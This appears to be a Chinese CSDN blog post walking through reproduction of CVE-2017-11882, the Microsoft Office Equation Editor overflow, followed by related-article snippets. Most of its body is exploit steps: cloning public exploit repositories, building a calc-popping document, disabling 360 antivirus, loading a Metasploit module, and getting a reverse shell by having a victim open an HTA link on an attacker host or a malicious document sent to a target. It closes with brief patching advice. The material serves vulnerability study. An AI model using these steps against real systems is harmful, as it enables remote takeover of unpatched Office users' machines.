[漏洞复现]office CVE-2017-11882

最新推荐文章于 2023-06-26 17:12:04 发布
最新推荐文章于 2023-06-26 17:12:04 发布
阅读量226 收藏 1
点赞数
文章标签: python windows linux 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a854596855/article/details/114920068
版权

1、漏洞概述

此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。
影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016

2、漏洞复现环境

3、实验步骤

3.1 验证漏洞

git clone https://github.com/Ridter/CVE-2017-11882
 cd CVE-2017-11882
 python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
image.png

将生成的test.doc拷贝到windows下,使用word2013打开,会弹出计算器,说明存在这个漏洞。注意需要关闭360,不然这个文件会被查杀。

漏洞验证成功

3.2 getshell

root@kali:~/Desktop/CVE-2017-11882/git clone https://github.com/0x09AL/CVE-2017-11882-metasploit.git
root@kali:~/Desktop/CVE-2017-11882/cd CVE-2017-11882-metasploit
root@kali:~/Desktop/CVE-2017-11882/CVE-2017-11882-metasploit# cp cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/local/
root@kali:~/Desktop/CVE-2017-11882/CVE-2017-11882-metasploit# cp cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/
msf5 > reload_all
image.png
image.png

在受害者机器上用浏览器打开 http://192.168.43.177:8080/11882,会下载一个hta文件,点击执行,就会回连
或者将/root/.msf4/local/11882.doc发送给目标,使用word2013打开后就会回连。
image.png

拿到shell
getshell

4 漏洞修复

①在线更新;开启Windows Update更新,这种方式对于大部分人来说就够了。
②打补丁;此漏洞对应的微软补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

参考资料

https://mp.weixin.qq.com/s?__biz=MzI5ODU1MjIwMg==&mid=2247484096&idx=1&sn=5ecc6a110e847dbc44cfa4a0d61fac8c&chksm=eca55c25dbd2d533206a60538de5135ffb55a380c2664dd7cc0a060afbf7c5a962e86c02309c&scene=21#wechat_redirecthttps://github.com/0x09AL/CVE-2017-11882-metasploit

~巴哥~
关注
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
WindowsCVE-2017-11882漏洞利用
古月浪子的博客
02-09 3070
CVE-2017-11882是一个Office漏洞,虽然该漏洞已经有补丁了,且杀毒软件也能查出利用了该漏洞的恶意文档,但是学习和复现漏洞仍是一项令人受益颇多的过程 为了复现漏洞,我们需要准备Office2016及以前的版本,这里我选择的是2016版本 利用漏洞的主要手段是,依靠公式编辑器中的缓冲区溢出执行短长度命令行以及Office自动在TEMP目录下临时释放附件的特性,达到执行任意代码的效果 导致漏洞的罪魁祸首就是一个叫EQNEDT32.EXE的程序,该文件的位置可以用任务管理器查看进程文件来定位
漏洞cve2017-11882
m0_64973256的博客
12-21 760
所以我们需要在EQNEDT32.exe中下断点,而不是word里面下断点。可以看到计算器的父进程是cmd,但是cmd的父进程存在PID,但是在列表中却找不到PID为1404的进程,卡顿许久,猜测或许是cmd父进程隐藏了自己或者启动时间太短,启动完自己结束。也就是这里是通过淹没返回地址到WinExec上,然后通过修改字符串控制WinExec的参数,启动cmd打开计算器实现。通过启动cmd,打开了计算器,而之后的的AAAA等都是传给计算器参数,是无效的。
CVE-2017-11882复现及防御
hl1293348082的专栏
04-01 1910
本文作者:\xeb\xfe,加上之前的文章《一道 CTF 题 get 到的新姿势》完成两篇文章的任务,邀请加入知识星球,欢迎更多的人加入我们,一起交流、一起学习。 最新 OfficeCVE-2017-11882,完美无弹窗,无视宏,影响 office 全版本。利用触发器 WebClient 服务从攻击者控制的 WebDav 服务器启动和执行远程文件。该脚本使用多个 OLE 对象创建简单的文档。这些对象利用 CVE-2017-11882,从而导致连续命令执行。 复现过程 实验环境: win.
Office远程代码执行漏洞CVE-2017-11882漏洞复现
大河之犬的博客
06-26 1958
CVE-2017-11882允许攻击者在当前用户的上下文中运行任意代码,导致无法正确处理内存中的对象,即为“ Microsoft Office Memory Corruption Vulnerability “,栈溢出的远程执行漏洞。它的功能是打开office文本的同时能够弹出计算机程序,本实验通过此文本验证目标靶机上是否存在Office远程代码执行漏洞CVE-2017-11882漏洞。可以看到以下变化:ftp服务器启动。在靶机桌面上可以看到上步ftp上传的文件的文件,双击打开此文件,即可建立连接了。
CVE-2017-11882 Office漏洞
sxr__nc的博客
03-16 797
简介 CVE-2017-11882属于缓冲区溢出类型漏洞,造成漏洞的原因是,EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。 深究其中的具体原因还要对ole文件的数据格式进行了解: ole文件的数据格式 ...
linux经典漏洞复现,[漏洞复现] CVE-2017-11882 通杀所有office版本
weixin_29065659的博客
05-16 934
1、漏洞概述这几个月来,针对微软Office套件最火热最流行的***手段,莫过于基于CVE-2017-11882漏洞利用。2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC***代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到201...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
CVE-2017-11882漏洞复现
weixin_30606461的博客
11-21 234
本文记录一下针对CVE-2017-11882漏洞复现 0x00 前言 参考backlion师傅的PDF,记录一下这个过程。 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞CVE-2017-11882)。该漏洞Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录...
office漏洞 (CVE-2017-11882)复现
芥子
01-25 3726
在/usr/share/metasploit-framework/modules/exploits/windows/smb上传 cve_2017_1182.rb 在/usr/share/metasploit-framework/data/exploits上传cve-2017-1182.rtf文件 以上的文件准备好后即可用msf来进行操作 在搜索模块的时候出现以下错误
漏洞复现|Microsoft Office数学公式编辑器内存损坏漏洞CVE-2017-11882
weixin_42282189的博客
10-26 407
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 1、漏洞简介 CVE-2017-11882是微软公布的一个远程执行漏洞,该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出。 2、影响范围 office 2003 office 2007 office 2010 office 2013 office 2016 3、测试环境 win10:21H1 offi.
CVE-2017-11882漏洞的分析记录
wojiukanxia的博客
02-20 684
漏洞介绍 漏洞分析 漏洞分析环境与工具 windows xp sp pro sp3,x32dbg,010editor,IDAPro 漏洞分析过程 1.获取poc https://github.com/embedi/CVE-2017-11882/tree/master/example 该poc弹出calc 2.漏洞复现 安装office 2...
CVE-2017-11882复现
yiyiiyiy的博客
11-24 3227
CVE-2017-11882复现 前言漏洞基本信息 漏洞ID CVE-2017-11882 漏洞名称 Microsoft Office数学公式编辑器内存损坏漏洞 威胁类型 远程代码执行 漏洞类型 栈溢出,位于EQNEDT32.EXE组件中 漏洞影响版本Microsoft Office 2000 Microsoft Office 2003Microsoft Office 2007 Service
[漏洞样本分析]CVE-2017-11882
r250414958的博客
11-01 3396
环境: Win7(专业版) office 2003 sp3(完全版) 工具: Ollydbg IDA Pro PEid Kali-Linux metasploit POC来源: https://github.com/embedi/CVE-2017-11882 漏洞介绍: 安全公司Embedi最早报告了漏洞,他们在一个老旧的微软工具Equation Editor中的EQNEDT32...
CVE-2017-11882漏洞分析
鬼手的博客
08-05 9761
文章目录分析环境漏洞描述漏洞成因漏洞分析获取poc复现漏洞漏洞分析定位漏洞模块定位漏洞函数定位漏洞触发点解决方案 分析环境 **环境:**W7 x64 Office2013 **工具:**windbg IDA Pro 漏洞描述 CVE-2017-11882是微软公布的一个远程执行漏洞,通杀目前市面上的所有office版本及Windows操作系统(包括刚刚停止支持的Office 2007)。该漏...
复现cve-2017-1000112
最新发布
09-04
CVE-2017-1000112 是一个在 Linux 内核的 Netfilter 子系统中的本地权限提升漏洞。Netfilter 是 Linux 内核的一部分,用于允许或拒绝进入或发出数据包的网络连接。这个漏洞允许本地用户通过特定条件下的 Netlink ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值